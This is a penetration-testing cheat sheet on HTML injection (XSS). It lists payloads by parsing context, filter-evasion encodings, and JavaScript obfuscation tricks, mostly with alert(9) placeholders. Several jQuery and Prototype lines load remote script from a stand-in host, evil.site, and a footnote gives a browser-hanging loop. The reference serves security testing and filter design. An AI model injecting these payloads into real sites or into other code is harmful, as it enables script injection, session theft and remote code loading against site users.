HTML Injection Quick Reference (HIQR)

Mike Shema, Deadliest Web Attacks
Repository: HIQR @ GitHub

Table 1: Injection Techniques for Various Parsing Contexts
Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation
Table 3: JavaScript Compositions for Manipulation & Obfuscation

Injection Techniques for Various Parsing Contexts1
Context State Injection Example
Data State
(Text node, open tag)
Welcome back, <script>☣</script>...
</element> <title>Search Results for '</title><script>☣<script>'</title>
-->2 <-- lorem ipsem--><script>☣<script>-->
]]> <FOO><![CDATA[]]><script>☣</script>]]>
Attribute value Unquoted <input type=text name=foo value=a><script>☣<script>>
<input type=text name=foo value=a/><script>☣<script>>
Single-quoted
(U+0027)
<input type=text name=foo value=''onevent=☣//'>
Double-quoted
(U+0022)
<input type=text name=foo value=""onevent=☣//">
JavaScript variable assignment Unquoted
Double-quoted
(U+0022)
<script>
var foo="";☣;//";
...
Single-quoted
(U+0027)
<script>
var foo='';☣;//';
...
Escape characters (blog post)
JavaScript Window.location object property
.hash
.href
.pathname
.search
URL https://web.site/page/<script>☣<script>
<script>
document.write("Page not found: " + window.location);
...
#fragment https://web.site/page#<script>☣<script>
<script>
document.write(window.location);
...
#jQuery3 https://web.site/page#<img/src=%22%22onerror=☣>
<script>
$(document).ready(function() {
  var x = (window.location.hash.match(/^#([^\/].+)$/) || [])[1];
  var w = $('a[name="' + x + '"], [id="' + x + '"]');
});
Footnotes
1 The biohazard symbol (U+2623) -- ☣ -- in each example represents a JavaScript payload. It could be anything from a while loop to DoS the browser, e.g. var a;while(1){a+="a"} to the ubiquitous alert(9). One of the safest payloads to use is console.log(id) where the id is a unique identifier. Not only is a log message unobtrusive, but the identifier helps identify when an injection point and reflection point are on different resources. In any case, these categories focus on the placement of the payload within the rendered document rather than the nature of the payload's execution.
Though it seems daunting to review the HTML5 syntax specification, doing so aids in understanding how HTML is supposed to be formed. HTML5 defines an explicit algorithm for parsing HTML documents. Read through the spec to become familiar with the expectations of Unicode code points, parse errors, and decisions a User Agent may make when dealing with markup. A standardized approach to parsing is supposed to minimize the quirks and differences among browsers, thus removing a historical source of insecurity. The HTML4 spec was not as clear or as rigourous on parsing.
2 Sometimes it's helpful to insert a space before the --> to ensure the tag is interpreted. [ HTML5 comments ]
3 This is a quirk of jQuery's design choice for overloading the $() API to accept selectors or elements.
top

Payload Crafting Techniques to Bypass Filters and Data Validation
Concept Notes Payload Example
Alternate attribute delimiters Forward slash <img/src=""onerror=alert(9)>
Dangling quoted string <a'' href'' onclick=alert(9)>foo</a>
<a"" href=""onclick=alert(9)>foo</a>
CRLF instead of space <img%0d%0asrc=""%0d%0aonerror=alert(9)>
HTML entity encoding JavaScript scheme
(Decimal, hex, unicode hex)
<a href="java&#115;cript:alert(9)">foo</a>
<a href="java&#x73;cript:alert(9)">foo</a>
<a href="java&#x0073;cript:alert(9)">foo</a>
JavaScript inline event handlers1
[ html4 | html5 ]
Unquoted <input type=text name=foo value=a%20onchange=alert(9)>
Double-quoted <input type="text" name="foo" value=""onmouseover=alert(9)//">
Single-quoted <input type='text' name='foo' value=''onclick=alert(9)//'>
HTML5 autofocus <input type="text" name="foo" value=""autofocus/onfocus=alert(9)//">
Data URI handlers2 src & href attributes <a href="data:text/html,<script>alert(9)</script>">foo</a>
<script src="data:,alert(9)"></script>
<script src="data:application/x-javascript,alert(9)"></script>
<script src="data:text/javascript,alert(9)"></script>
Base64 data <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg">foo</a>
<script src="data:;base64,YWxlcnQoOSk"></script>
Alternate character sets <a href="data:text/html;charset=utf-16,
%ff%fe%3c%00s%00c%00r%00i%00p%00t%00%3e
%00a%00l%00e%00r%00t%00(%009%00)%00
<%00/%00s%00c%00r%00i%00p%00t%00>%00">foo</a>
Alternate markup SVG <svg onload="javascript:alert(9)" xmlns="https://www.w3.org/2000/svg"></svg>
<svg xmlns="https://www.w3.org/2000/svg">
<g onload="javascript:alert(9)"></g></svg>
<svg><script xlink:href=data:,alert(9)></script>
<svg xmlns="https://www.w3.org/2000/svg">
<a xmlns:xlink="https://www.w3.org/1999/xlink" xlink:href="javascript:alert(9)">
<rect width="1000" height="1000" fill="white"/></a></svg>
Untidy markup Missing greater-than sign <script%0d%0aalert(9)</script>
<script%20<!--%20-->alert(9)</script>
Recover from syntax error <a href=""&<img&amp;/onclick=alert(9)>foo</a>
<script/<a>alert(9)</script>
<script/<a>alert(9)</script </a>
Uncommon syntax <a""id=a href=''onclick=alert(9)>foo</a>
Orphan entity <a href=""&amp;/onclick=alert(9)>foo</a>
Vestigal attribute <script/id="a">alert(9)</script>
Anti-regex patterns Element closed prematurely <img src=">"onerror=alert(9)>
Element confusion <img id="><"class="><"src=">"onerror=alert(9)>
Quote confusion <img src="\"a=">"onerror=alert(9)>
<a id=' href="">'href=javascript:alert(9)>foo</a>
<a id='href=https://web.site/'onclick=alert(9)>foo</a>
<a href= . '"\' onclick=alert(9) '"'>foo</a>
Quote confusion with element <img src="\"'<a href='">"'onerror=alert(9)>
<a id='https://web.site/'onclick=alert(9)<!--href=a>foo</a>-->
Quote mixing with element <img src="'"id='<img src="">'onerror=alert(9)>
Recursive elements <img src="<img src='<img src=.>'>"onerror=alert(9)>
Repeated attributes (match last occurrence)3 <a href=javascript:alert(9) href href='' href="">foo</a>
Footnotes
1 HTML5's Content Security Policy headers can neutralize these attacks by preventing the User Agent from executing JavaScript within this context unless the page author is forced to include the "unsafe-inline" directive.
2 The basic format is dataurl := "data:" [ mediatype ] [ ";base64" ] "," data. The scheme is defined in RFC 2397.
3 Per HTML5 spec, "When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute's name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any)."
top

JavaScript Compositions for Manipulation & Obfuscation
Technique Notes Example
Concatenation String operators var a = "foo"+alert(9)//";
Logical operators var a = "foo"&&alert(9)//";
Mathematical operators var a = "foo"/alert(9)//";
Function execution Anonymous (function(){alert(9)})()
Method lookup window["alert"](9)
Strings String object String.fromCharCode(0x61,0x62)
Regex object source attribute alert(/foo bar/.source)
window[/alert/.source](9)
Harness functions from a JavaScript library Angular angular.bind(self, alert, 9)()
angular.element.apply(alert(9))
Ember JS Ember.run(null, alert, 9)
jQuery $.get('//evil.site/')
(site serves alert(9))
$.getScript('//evil.site/')
(site serves alert(9))
$('#main').load('//evil.site/');
(site serves <script>alert(9)</script> into selector, e.g. #main)
$.globalEval(alert(9))
Prototype
(Ajax will trigger CORS)
Prototype.K(alert)(9)
new Ajax.Request('//evil.site/')
(site serves alert(9) and CORS headers)
Underscore _.defer(alert, 9)
_.delay(alert, 0, 9)
_.once(alert(9))
Type coercion 1) Boolean + Object converts to String false + "" == "false"
![] + []
2) Extract character from String by index ( false + "" )[1] == "a"
( ![] + [] )[1]
3) Compose String from characters "alert"
(![]+[])[1] +
(![]+[])[2] +
(![]+[])[4] +
(!![]+[])[1] +
(!![]+[])[0]
4) Execute function by method lookup (window["alert"])(9)
(window["ale"+"rt"])(9)
(window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
(!![]+[])[1] + (!![]+[])[0]])(9)
Footnotes
top

Creative Commons License
HTML Injection Quick Reference by Mike Shema is licensed under a Creative Commons Attribution 4.0 International License.